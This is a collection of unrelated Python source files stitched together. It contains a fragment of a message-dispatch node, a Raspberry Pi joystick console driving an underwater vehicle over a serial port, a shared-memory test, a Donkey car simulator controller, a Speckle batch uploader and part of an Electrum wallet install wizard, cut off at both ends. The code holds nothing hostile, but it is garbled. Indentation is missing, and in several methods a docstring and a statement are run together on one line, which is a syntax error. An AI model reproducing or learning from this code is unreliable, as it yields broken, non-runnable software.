connection.send(message)
ids.append(message[FLD_ID])
message[FLD_ID] = assignuniqueid()
return ids
def terminate_handler(self, signal, frame):
if self.debug: self.logger.write("State", "exiting...")
self.logger.close()
sys.stdout.flush()
sys.stderr.flush()
os._exit(0)
def _graceexit(self, exitcode=0):
sys.stdout.flush()
sys.stderr.flush()
if hasattr(self, 'logger'): self.logger.close()
os._exit(exitcode)
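# Illustrative sketch (not part of the node implementation above): the same
# getattr-based dispatch that process_message() and get_user_input_from_shell()
# rely on. Message/command names are mapped to "msg_<name>" / "cmd_<name>"
# methods and resolved at runtime, so supporting a new message type only
# requires defining another handler method. All names below are hypothetical.
class _DispatchSketch(object):
    def dispatch(self, name, *args):
        method = getattr(self, "msg_%s" % name.lower(), None)
        if method is None:
            return False          # unsupported message type
        method(*args)
        return True
    def msg_ping(self, conn):
        print("PING received over %s" % conn)
# Example: _DispatchSketch().dispatch("PING", "peer-1") prints the line above
# and returns True; an unknown name returns False.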
|
main_pult.py
|
import os
import pygame
import logging
import threading
import configparser
from pprint import pprint
from time import sleep
from ast import literal_eval
from datetime import datetime
from signal import signal, SIGTERM, SIGHUP, pause
from rpi_lcd import LCD
import serial
DEBUG = False
PATH_CONFIG = '/home/pi/SoftAcademic/raspberry-pult/config_rov.ini'
class PULT_Logging:
    '''Logging class. Log records are written to a file and also echoed to the console.'''
def __init__(self):
self.mylogs = logging.getLogger(__name__)
self.mylogs.setLevel(logging.DEBUG)
        # handler that writes the log to a file
name = 'log/PULT_LOG_' + \
'-'.join('-'.join('-'.join(str(datetime.now()).split()
).split('.')).split(':')) + '.log'
self.file = logging.FileHandler(name)
self.fileformat = logging.Formatter(
"%(asctime)s:%(levelname)s:%(message)s")
self.file.setLevel(logging.DEBUG)
self.file.setFormatter(self.fileformat)
        # handler that echoes the log to the console
self.stream = logging.StreamHandler()
self.streamformat = logging.Formatter(
"%(levelname)s:%(module)s:%(message)s")
self.stream.setLevel(logging.DEBUG)
self.stream.setFormatter(self.streamformat)
        # attach the handlers
self.mylogs.addHandler(self.file)
self.mylogs.addHandler(self.stream)
self.mylogs.info('start-logging')
def debug(self, message):
        '''debug-level messages'''
self.mylogs.debug(message)
def info(self, message):
        '''info-level messages'''
self.mylogs.info(message)
def warning(self, message):
        '''non-critical errors'''
self.mylogs.warning(message)
def critical(self, message):
        '''we are almost sinking'''
self.mylogs.critical(message)
def error(self, message):
        '''guys, I'm bailing out, it's about to blow !!!!'''
self.mylogs.error(message)
class PULT_Controller():
def __init__(self, config) -> None:
os.environ["SDL_VIDEODRIVER"] = "dummy"
self.pygame = pygame
self.pygame.init()
self.config = config
joysticks = []
for i in range(self.pygame.joystick.get_count()):
joysticks.append(self.pygame.joystick.Joystick(i))
for self.joystick in joysticks:
self.joystick.init()
self.DataPult = {'j1-val-y': 0, 'j1-val-x': 0,
'j2-val-y': 0, 'j2-val-x': 0,
'man': 90, 'servoCam': 90,
'led': 0}
self.nitro = True
self.running = True
def listen(self):
cor_servo_cam = 0
while self.running:
for event in self.pygame.event.get():
                # poll button presses
if event.type == pygame.JOYBUTTONDOWN:
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_up']]):
cor_servo_cam = 1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_down']]):
cor_servo_cam = -1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['arm_up']]):
self.DataPult['man'] = 180
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['arm_down']]):
self.DataPult['man'] = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['led_up']]):
self.DataPult['led'] = 1
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['led_down']]):
self.DataPult['led'] = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['nitro_up']]):
self.nitro = True
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['nitro_down']]):
self.nitro = False
if event.type == pygame.JOYBUTTONUP:
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_up']]):
cor_servo_cam = 0
if event.button == int(self.config['JOYSTICK'][self.config['JOYSTICK']['camera_down']]):
cor_servo_cam = 0
                # poll the analog sticks
if event.type == pygame.JOYAXISMOTION and abs(event.value) > float(self.config['JOYSTICK']['min_value']):
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_forward_back']]):
if self.nitro:
self.DataPult['j1-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['forward_back_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_forward_back_nitro'])
else:
self.DataPult['j1-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['forward_back_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_forward_back_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_left_right']]):
if self.nitro:
self.DataPult['j1-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['left_right_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_left_right_nitro'])
else:
self.DataPult['j1-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['left_right_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_left_right_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_up_down']]):
if self.nitro:
self.DataPult['j2-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['up_down_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_up_down_nitro'])
else:
self.DataPult['j2-val-y'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['up_down_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_up_down_defolt'])
if event.axis == int(self.config['JOYSTICK'][self.config['JOYSTICK']['move_turn-left_turn-righ']]):
if self.nitro:
self.DataPult['j2-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['turn-left_turn-righ_nitro']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_turn-left_turn-righ_nitro'])
else:
self.DataPult['j2-val-x'] = int(round(event.value, 2) * float(
self.config['JOYSTICK']['turn-left_turn-righ_defolt']) * float(self.config['JOYSTICK']['power_motor']) * 32767) - float(self.config['JOYSTICK']['cor_turn-left_turn-righ_defolt'])
else:
self.DataPult['j1-val-y'], self.DataPult['j2-val-y'], self.DataPult['j1-val-x'], self.DataPult['j2-val-x'] = 0, 0, 0, 0
                    # re-initialize the joystick after a disconnect
if not self.joystick.get_init():
joysticks = []
for i in range(self.pygame.joystick.get_count()):
joysticks.append(self.pygame.joystick.Joystick(i))
for self.joystick in joysticks:
self.joystick.init()
break
            # compute the payload (camera servo) position
self.DataPult['servoCam'] += cor_servo_cam
if self.DataPult['servoCam'] > 180:
self.DataPult['servoCam'] = 180
elif self.DataPult['servoCam'] < 0:
self.DataPult['servoCam'] = 0
sleep(float(self.config['JOYSTICK']['time_sleep']))
# print(self.DataPult)
def stop_listen(self):
self.running = False
class PULT_SerialPort:
def __init__(self,
logger: PULT_Logging = PULT_Logging,
port: str = '/dev/ttyS0',
bitrate: int = 115200
):
global DEBUG
        # initialize state
self.check_connect = False
self.logger = logger
        # open the serial port
self.serial_port = serial.Serial(
port=port,
baudrate=bitrate,
timeout=0.1)
def Receiver_tnpa(self):
        '''receive data from the vehicle'''
        global DEBUG
data = None
while data == None or data == b'':
data = self.serial_port.readline()
try:
dataout = list(
map(lambda x: float(x), str(data)[3:-4].split(', ')))
except:
self.logger.warning('Error converting data')
return None
if DEBUG:
self.logger.debug(f'Receiver data : {str(data)}')
return dataout
def Control_tnpa(self, data: list = [50, 50, 50, 50, 50, 50, 90, 0, 0, 0]):
        '''send the command array to the vehicle'''
        global DEBUG
self.serial_port.write((f'{str(data)}\n').encode())
if DEBUG:
self.logger.debug('Send data: ' + str(data))
class PULT_Main:
def __init__(self):
self.DataInput = []
self.config = configparser.ConfigParser()
self.config.read(PATH_CONFIG)
# self.lcd = LCD()
# def safe_exit(signum, frame):
# exit(1)
# try:
# signal(SIGTERM, safe_exit)
# signal(SIGHUP, safe_exit)
# self.lcd.text("Hello,", 1)
# self.lcd.text("Command Post!", 2)
# except:
# pass
# finally:
# self.lcd.clear()
self.lodi = PULT_Logging()
        self.serial_port = PULT_SerialPort(self.lodi)  # bring up the serial link
#self.lodi.info('ServerMainPult - init')
        self.Controllps4 = PULT_Controller(self.config)  # bring up the controller
#self.lodi.info('MyController - init')
self.DataPult = self.Controllps4.DataPult
        # command send period (seconds)
self.RateCommandOut = 0.1
        # log sent and received data to the log file
self.telemetria = False
#
self.CHECK_CONNECT = False
self.correct = True
self.lodi.info('MainPost-init')
def RunController(self):
        '''start listening to the PS4 controller'''
# self.lodi.info('MyController-listen')
self.Controllps4.listen()
def RunCommand(self, CmdMod=True):
        '''
        Move forward      - (1 forward 2 forward 3 reverse 4 reverse)
        Move backward     - (1 reverse 2 reverse 3 forward 4 forward)
        Strafe right      - (1 reverse 2 forward 3 forward 4 reverse)
        Strafe left       - (1 forward 2 reverse 3 reverse 4 forward)
        Move up           - (5 down 6 down)
        Move down         - (5 up 6 up)
        Transfer protocol:
        From the control post:
        [motor0, motor1, motor2, motor3, motor4, motor5, ServoCam, Arm, led0, led1]
        defaults:
        [0, 0, 0, 0, 0, 0, 90, 0, 0, 0]
        From the vehicle:
        [voltage(V), current draw(A), heading(degrees), depth(m)]
        [0,0,0,0]
        '''
        self.lodi.info('MainPost-RunCommand')
def transformation(value: int):
            # convert a raw joystick ADC value into a percentage (0..100)
value = (32768 - value) // 655
return value
def defense(value: int):
            '''clamp the value to the valid 0..100 range'''
if value > 100:
value = 100
elif value < 0:
value = 0
return value
while True:
dataout = []
            # fetch the latest data from the controller class (potential weak spot)
            data = self.DataPult
            # convert the joystick values into motor commands
if self.telemetria:
self.lodi.debug(f'DataPult-{data}')
if self.correct:
J1_Val_Y = transformation(data['j1-val-y'])
J1_Val_X = transformation(data['j1-val-x'])
J2_Val_Y = transformation(data['j2-val-y'])
J2_Val_X = transformation(data['j2-val-x'])
else:
J1_Val_Y = transformation(data['j1-val-y'])
J1_Val_X = transformation(data['j1-val-x'])
J2_Val_Y = transformation(data['j2-val-y'])
J2_Val_X = transformation(data['j2-val-x'])
            # build the array to send to the vehicle
dataout.append(defense(J1_Val_Y + J1_Val_X + J2_Val_X - 100))
dataout.append(defense(J1_Val_Y - J1_Val_X - J2_Val_X + 100))
dataout.append(defense((-1 * J1_Val_Y) -
J1_Val_X + J2_Val_X + 100))
dataout.append(100 - defense((-1 * J1_Val_Y) +
J1_Val_X - J2_Val_X + 100))
dataout.append(defense(J2_Val_Y))
dataout.append(100 - defense(J2_Val_Y))
dataout.append(data['servoCam'])
if data['man'] > 80:
data['man'] = 80
if data['man'] < 55:
data['man'] = 55
dataout.append(data['man'])
dataout.append(data['led'])
dataout.append(data['led'])
            # log the control array
            if self.telemetria:
                self.lodi.debug(f'DataOutput - {dataout}')
            # send and receive messages
self.serial_port.Control_tnpa(dataout)
self.DataInput = self.serial_port.Receiver_tnpa()
            if self.DataInput is None:
self.CHECK_CONNECT = False
self.lodi.critical('DataInput - NONE')
else:
self.CHECK_CONNECT = True
            # log the received array
            if self.telemetria:
                self.lodi.debug(f'DataInput - {self.DataInput}')
            # optionally print the received data to the command line
if CmdMod:
print(self.DataInput)
sleep(self.RateCommandOut)
def RunMain(self):
self.ThreadJoi = threading.Thread(target=self.RunController)
self.ThreadCom = threading.Thread(target=self.RunCommand)
self.ThreadJoi.start()
self.ThreadCom.start()
if __name__ == '__main__':
post = PULT_Main()
post.RunMain()
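# Worked example (illustrative, values assumed) of the joystick-to-motor math in
# RunCommand(): transformation() rescales a signed 16-bit stick value to a
# 0..100 percentage and defense() clamps the mixed motor commands to that range.
#
#   raw stick value -32768  ->  (32768 - (-32768)) // 655 = 100  (full one way)
#   raw stick value      0  ->  (32768 - 0)        // 655 = 50   (neutral)
#   raw stick value  32767  ->  (32768 - 32767)    // 655 = 0    (full other way)
#
# defense(v) is equivalent to max(0, min(100, v)), so a mixed command such as
# J1_Val_Y + J1_Val_X + J2_Val_X - 100 can never leave the 0..100 range the
# vehicle side expects.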
|
test.py
|
import time
from multiprocessing import Process
import shmarray
def worker(data):
while True:
data += 1
time.sleep(1)
def monitor(data):
while True:
print(data)
time.sleep(0.5)
data = shmarray.zeros(10)
procs = [Process(target=worker, args=(data,)), Process(target=monitor, args=(data,))]
for p in procs:
p.start()
for p in procs:
p.join()
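# Note (assuming shmarray.zeros returns a numpy array backed by shared memory,
# as the module name suggests): "data += 1" mutates that shared buffer in place,
# which is why the monitor process sees the increments; rebinding with
# "data = data + 1" would only update the worker's local reference.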
|
donkey_sim.py
|
'''
file: donkey_sim.py
author: Tawn Kramer
date: 2018-08-31
'''
import os
import json
import shutil
import base64
import random
import time
import math
import datetime
import asyncore
from io import BytesIO
from threading import Thread
import numpy as np
from PIL import Image
from donkey_gym.core.fps import FPSTimer
from donkey_gym.core.tcp_server import IMesgHandler, SimServer
from donkey_gym.envs.donkey_ex import SimFailed
class DonkeyUnitySimContoller():
def __init__(self, level, time_step=0.05, port=9090, max_cte=5.0, verbose=False, cam_resolution=(120, 160, 3)):
self.address = ('0.0.0.0', port)
self.handler = DonkeyUnitySimHandler(level, time_step=time_step, max_cte=max_cte, verbose=verbose, cam_resolution=cam_resolution)
try:
self.server = SimServer(self.address, self.handler)
except OSError:
print('raising custom error')
raise SimFailed("failed to listen on address %s" % self.address)
self.thread = Thread(target=asyncore.loop)
self.thread.daemon = True
self.thread.start()
def wait_until_loaded(self):
while not self.handler.loaded:
print("waiting for sim to start..")
time.sleep(3.0)
def reset(self):
self.handler.reset()
def get_sensor_size(self):
return self.handler.get_sensor_size()
def take_action(self, action):
self.handler.take_action(action)
def observe(self):
return self.handler.observe()
def quit(self):
pass
def render(self, mode):
pass
def is_game_over(self):
return self.handler.is_game_over()
def calc_reward(self, done):
return self.handler.calc_reward(done)
class DonkeyUnitySimHandler(IMesgHandler):
def __init__(self, level, time_step=0.05, max_cte=5.0, verbose=False, cam_resolution=None):
self.iSceneToLoad = level
self.time_step = time_step
self.wait_time_for_obs = 0.1
self.sock = None
self.loaded = False
self.verbose = verbose
self.max_cte = max_cte
self.timer = FPSTimer()
# sensor size - height, width, depth
self.camera_img_size = cam_resolution
self.image_array = np.zeros(self.camera_img_size)
self.last_obs = None
self.hit = "none"
self.cte = 0.0
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.speed = 0.0
self.over = False
self.fns = {'telemetry' : self.on_telemetry,
"scene_selection_ready" : self.on_scene_selection_ready,
"scene_names": self.on_recv_scene_names,
"car_loaded" : self.on_car_loaded }
def on_connect(self, socketHandler):
self.sock = socketHandler
def on_disconnect(self):
self.sock = None
def on_recv_message(self, message):
if not 'msg_type' in message:
print('expected msg_type field')
return
msg_type = message['msg_type']
if msg_type in self.fns:
self.fns[msg_type](message)
else:
print('unknown message type', msg_type)
## ------- Env interface ---------- ##
def reset(self):
if self.verbose:
print("reseting")
self.image_array = np.zeros(self.camera_img_size)
self.last_obs = self.image_array
self.hit = "none"
self.cte = 0.0
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.speed = 0.0
self.over = False
self.send_reset_car()
self.timer.reset()
time.sleep(1)
def get_sensor_size(self):
return self.camera_img_size
def take_action(self, action):
if self.verbose:
print("take_action")
self.send_control(action[0], action[1])
def observe(self):
while self.last_obs is self.image_array:
time.sleep(1.0 / 120.0)
self.last_obs = self.image_array
observation = self.image_array
done = self.is_game_over()
reward = self.calc_reward(done)
info = {}
self.timer.on_frame()
return observation, reward, done, info
def is_game_over(self):
return self.over
## ------ RL interface ----------- ##
def calc_reward(self, done):
if done:
return -1.0
if self.cte > self.max_cte:
return -1.0
if self.hit != "none":
return -2.0
        # going fast close to the center of the lane yields the best reward
return 1.0 - (self.cte / self.max_cte) * self.speed
## ------ Socket interface ----------- ##
def on_telemetry(self, data):
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
#always update the image_array as the observation loop will hang if not changing.
self.image_array = np.asarray(image)
#don't update other telemetry once session over
if self.over:
return
self.hit = data["hit"]
self.x = data["pos_x"]
self.y = data["pos_y"]
self.z = data["pos_z"]
self.speed = data["speed"]
        # Cross track error is not always present.
        # It will be missing if the path is not set up in the given scene.
        # It should be set up in the 4 scenes available now.
        try:
            self.cte = data["cte"]
        except KeyError:
            pass
self.determine_episode_over()
def determine_episode_over(self):
        # A few initial frames at startup sometimes report a very large CTE while the car
        # is just slightly behind the path; ignore those.
if math.fabs(self.cte) > 2 * self.max_cte:
pass
elif math.fabs(self.cte) > self.max_cte:
if self.verbose:
print("game over: cte", self.cte)
self.over = True
elif self.hit != "none":
if self.verbose:
print("game over: hit", self.hit)
self.over = True
def on_scene_selection_ready(self, data):
print("SceneSelectionReady ")
self.send_get_scene_names()
def on_car_loaded(self, data):
if self.verbose:
print("car loaded")
self.loaded = True
def on_recv_scene_names(self, data):
if data:
names = data['scene_names']
if self.verbose:
print("SceneNames:", names)
self.send_load_scene(names[self.iSceneToLoad])
def send_control(self, steer, throttle):
if not self.loaded:
return
msg = { 'msg_type' : 'control', 'steering': steer.__str__(), 'throttle':throttle.__str__(), 'brake': '0.0' }
self.queue_message(msg)
def send_reset_car(self):
msg = { 'msg_type' : 'reset_car' }
self.queue_message(msg)
def send_get_scene_names(self):
msg = { 'msg_type' : 'get_scene_names' }
self.queue_message(msg)
def send_load_scene(self, scene_name):
msg = { 'msg_type' : 'load_scene', 'scene_name' : scene_name }
self.queue_message(msg)
def queue_message(self, msg):
if self.sock is None:
if self.verbose:
                print('skipping:', msg)
return
if self.verbose:
print('sending', msg)
self.sock.queue_message(msg)
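# Hedged usage sketch of the controller above (illustrative only; assumes the
# Donkey Unity simulator is running and connects on port 9090):
#
#   conn = DonkeyUnitySimContoller(level=0, port=9090)
#   conn.wait_until_loaded()
#   conn.take_action((0.0, 0.2))              # (steering, throttle)
#   obs, reward, done, info = conn.observe()  # standard RL step tuple
#   if done:
#       conn.reset()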
|
batch_sender.py
|
import json
import logging
import threading
import queue
import time
import gzip
import requests
from specklepy.logging.exceptions import SpeckleException
LOG = logging.getLogger(__name__)
class BatchSender(object):
def __init__(
self,
server_url,
stream_id,
token,
max_batch_size_mb=1,
batch_buffer_length=10,
thread_count=4,
):
self.server_url = server_url
self.stream_id = stream_id
self._token = token
self.max_size = int(max_batch_size_mb * 1000 * 1000)
self._batches = queue.Queue(batch_buffer_length)
self._crt_batch = []
self._crt_batch_size = 0
self.thread_count = thread_count
self._send_threads = []
self._exception = None
def send_object(self, id: str, obj: str):
if not self._send_threads:
self._create_threads()
crt_obj_size = len(obj)
if not self._crt_batch or self._crt_batch_size + crt_obj_size < self.max_size:
self._crt_batch.append((id, obj))
self._crt_batch_size += crt_obj_size
return
self._batches.put(self._crt_batch)
self._crt_batch = [(id, obj)]
self._crt_batch_size = crt_obj_size
def flush(self):
# Add current non-complete batch
if self._crt_batch:
self._batches.put(self._crt_batch)
self._crt_batch = []
self._crt_batch_size = 0
# Wait for queued batches to be sent
self._batches.join()
# End the sending threads
self._delete_threads()
# If there was any error, throw the first exception that occurred during upload
if self._exception is not None:
ex = self._exception
self._exception = None
raise ex
def _sending_thread_main(self):
try:
session = requests.Session()
session.headers.update(
{"Authorization": f"Bearer {self._token}", "Accept": "text/plain"}
)
while True:
batch = self._batches.get()
# None is a sentinel value, meaning the thread should exit gracefully
if batch is None:
self._batches.task_done()
break
try:
self._bg_send_batch(session, batch)
except Exception as ex:
self._exception = self._exception or ex
LOG.error("Error sending batch of objects to server: " + str(ex))
self._batches.task_done()
except Exception as ex:
self._exception = self._exception or ex
LOG.error("ServerTransport sending thread error: " + str(ex))
def _bg_send_batch(self, session, batch):
object_ids = [obj[0] for obj in batch]
server_has_object = session.post(
url=f"{self.server_url}/api/diff/{self.stream_id}",
data={"objects": json.dumps(object_ids)},
).json()
new_object_ids = [x for x in object_ids if not server_has_object[x]]
new_object_ids = set(new_object_ids)
new_objects = [obj[1] for obj in batch if obj[0] in new_object_ids]
if not new_objects:
LOG.info(
f"Uploading batch of {len(batch)} objects: all objects are already in the server"
)
return
upload_data = "[" + ",".join(new_objects) + "]"
upload_data_gzip = gzip.compress(upload_data.encode())
LOG.info(
"Uploading batch of %s objects (%s new): (size: %s, compressed size: %s)"
% (len(batch), len(new_objects), len(upload_data), len(upload_data_gzip))
)
try:
r = session.post(
url=f"{self.server_url}/objects/{self.stream_id}",
files={"batch-1": ("batch-1", upload_data_gzip, "application/gzip")},
)
if r.status_code != 201:
LOG.warning("Upload server response: %s", r.text)
raise SpeckleException(
message=f"Could not save the object to the server - status code {r.status_code}"
)
except json.JSONDecodeError as error:
return SpeckleException(
f"Failed to send objects to {self.server_url}. Please ensure this stream ({self.stream_id}) exists on this server and that you have permission to send to it.",
error,
)
def _create_threads(self):
for _ in range(self.thread_count):
t = threading.Thread(target=self._sending_thread_main, daemon=True)
t.start()
self._send_threads.append(t)
def _delete_threads(self):
for _ in range(len(self._send_threads)):
self._batches.put(None)
for thread in self._send_threads:
thread.join()
self._send_threads = []
def __del__(self):
self._delete_threads()
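# Hedged usage sketch (server URL, stream id, token and the object iterable are
# placeholders): objects queued with send_object() are uploaded in batches by
# the background threads; flush() blocks until every queued batch is sent and
# re-raises the first upload error, if any.
#
#   sender = BatchSender("https://speckle.example.com", "stream_id", "token")
#   for obj_id, obj_json in serialized_objects:
#       sender.send_object(obj_id, obj_json)
#   sender.flush()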
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('ElectrumG - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrumg_small.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('ElectrumG wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
